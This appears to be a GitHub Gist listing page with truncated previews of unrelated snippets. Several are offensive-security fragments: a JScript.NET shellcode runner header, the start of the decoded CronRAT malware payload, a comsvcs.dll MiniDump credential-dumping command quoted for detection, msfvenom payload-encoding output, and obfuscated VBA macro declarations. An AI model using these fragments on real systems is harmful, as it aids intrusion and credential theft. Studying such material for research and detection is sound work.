Rick Henderson rickhenderson
rickhenderson
/ jscriptsc.js
Created
January 23, 2024 21:04
— forked from nek0y4nsu/jscriptsc.js
Janky Old JScript.NET Shellcode Runner
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
gwillem
/ _cronrat.sh
Last active
August 27, 2024 18:17
This is the decoded payload from the CRON loader. Full analysis here: https://sansec.io/research/cronrat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| set -eEu | |
| set -o pipefail | |
| trap 'echo "L$LINENO"; O70; exit -1' ERR | |
| O54=4 | |
| function O70() | |
| { | |
| if [[ ! -z "${O57+x}" ]]; then | |
| if [[ -f "${O57}" ]]; then | |
| rm -f "${O57}" | |
| fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| By @JohnLaTwC | |
| References: | |
| https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense) | |
| https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ | |
| https://twitter.com/SBousseaden/status/1407742041170268166 - Calling MiniDump export by ordinal examples: (comsvcs,#24) | |
| Detection Examples: | |
| "C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full |
farzinenddo
/ Powerless.cpp
Created
March 23, 2020 18:44
Running Powershell with CLR in native runtime.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <metahost.h> | |
| #pragma comment(lib, "mscoree.lib") | |
| int main(int argc, wchar_t* argv[]) | |
| { | |
| HRESULT hr; | |
| ICLRMetaHost *pMetaHost = NULL; | |
| ICLRRuntimeInfo *pRuntimeInfo = NULL; | |
| ICLRRuntimeHost *pClrRuntimeHost = NULL; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ❯ msfvenom -f python -p windows/exec cmd=calc exitfunc=seh --bad-chars '\x00\x20\x25\x26\x27\x2b\x2f\x5c\x7e' --smallest | |
| [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload | |
| [-] No arch selected, selecting arch: x86 from the payload | |
| Found 11 compatible encoders | |
| Attempting to encode payload with 1 iterations of x86/shikata_ga_nai | |
| x86/shikata_ga_nai succeeded with size 216 (iteration=0) | |
| Attempting to encode payload with 1 iterations of generic/none | |
| generic/none failed with Encoding failed due to a bad character (index=3, char=0x00) | |
| Attempting to encode payload with 1 iterations of x86/call4_dword_xor | |
| x86/call4_dword_xor succeeded with size 216 (iteration=0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long | |
| Private Declare PtrSafe Function GetCurrentProcessId Lib "kernel32" () As Long | |
| Public Declare Function Keio2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long | |
| Public Declare Function VEEAAM2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long | |
| Public Declare Function wspPush2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long | |
| Declare Function GetLogicalDrives& Lib "kernel32" () | |
| Declare Function GetShortPathName Lib "Kernel32.dll" Alias _ | |
| Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" ( _ | |
| Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long | |
| Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long |
jesusninoc
/ PowershellAes.ps1
Created
December 17, 2019 15:30
— forked from ctigeek/PowershellAes.ps1
Aes Encryption using powershell.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Create-AesManagedObject($key, $IV) { | |
| $aesManaged = New-Object "System.Security.Cryptography.AesManaged" | |
| $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC | |
| $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros | |
| $aesManaged.BlockSize = 128 | |
| $aesManaged.KeySize = 256 | |
| if ($IV) { | |
| if ($IV.getType().Name -eq "String") { | |
| $aesManaged.IV = [System.Convert]::FromBase64String($IV) | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; млллллм млллллм млллллм | |
| ; кФ Benny's Compression Engine for Win32 ФП ллл ллл ллл ллл ллл ллл | |
| ; Г by Г мммллп плллллл ллллллл | |
| ; РФФФФФФФФФФФФФ Benny / 29A ФФФФФФФФФФФФФФй лллмммм ммммллл ллл ллл | |
| ; ллллллл ллллллп ллл ллл | |
| ; | |
| ; | |
| ; | |
| ;Hello everybody, | |
| ; |
mylesmharrison
/ mandelbrot.R
Created
December 16, 2014 18:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Mandelbrot.R | |
| # Myles Harrison | |
| # everydayanaltics.ca | |
| # ------------------- | |
| # "Naive" version | |
| mandelbrot_naive <- function(xmin=-2, xmax=2, nx=500, | |
| ymin=-1.5, ymax=1.5, ny=500, | |
| n=100, showplot=TRUE, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Enter your code here. Read input from STDIN. Print output to STDOUT | |
| class Node: | |
| def __init__(self,value,point): | |
| self.value = value | |
| self.point = point | |
| self.parent = None | |
| self.H = 0 | |
| self.G = 0 | |
| def move_cost(self,other): | |
| return 0 if self.value == '.' else 1 |
NewerOlder